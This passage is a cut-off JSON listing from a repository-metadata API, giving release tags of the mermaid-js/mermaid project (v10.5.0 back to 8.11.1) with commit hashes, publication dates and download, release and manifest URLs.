osts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1",